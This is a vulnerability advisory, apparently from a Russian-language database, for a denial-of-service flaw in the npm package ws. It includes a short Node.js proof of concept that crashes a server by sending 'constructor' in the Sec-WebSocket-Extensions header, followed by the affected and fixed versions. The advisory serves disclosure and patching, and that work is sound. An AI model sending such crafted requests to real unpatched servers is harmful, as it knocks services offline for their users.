Описание
Denial of Service in ws
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
Proof of concept
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
const request = [
'GET / HTTP/1.1',
'Connection: Upgrade',
'Sec-WebSocket-Key: test',
'Sec-WebSocket-Version: 8',
`Sec-WebSocket-Extensions: ${payload}`,
'Upgrade: websocket',
'\r\n'
].join('\r\n');
const socket = net.connect(3000, function () {
socket.resume();
socket.write(request);
});
});
Recommendation
Update to version 3.3.1 or later.
Пакеты
Наименование
ws
npm
Затронутые версииВерсия исправления
>= 0.2.6, < 1.1.5
1.1.5
Наименование
ws
npm
Затронутые версииВерсия исправления
>= 2.0.0, < 3.3.1
3.3.1
7.5 High
CVSS3
Дефекты
CWE-400
7.5 High
CVSS3
Дефекты
CWE-400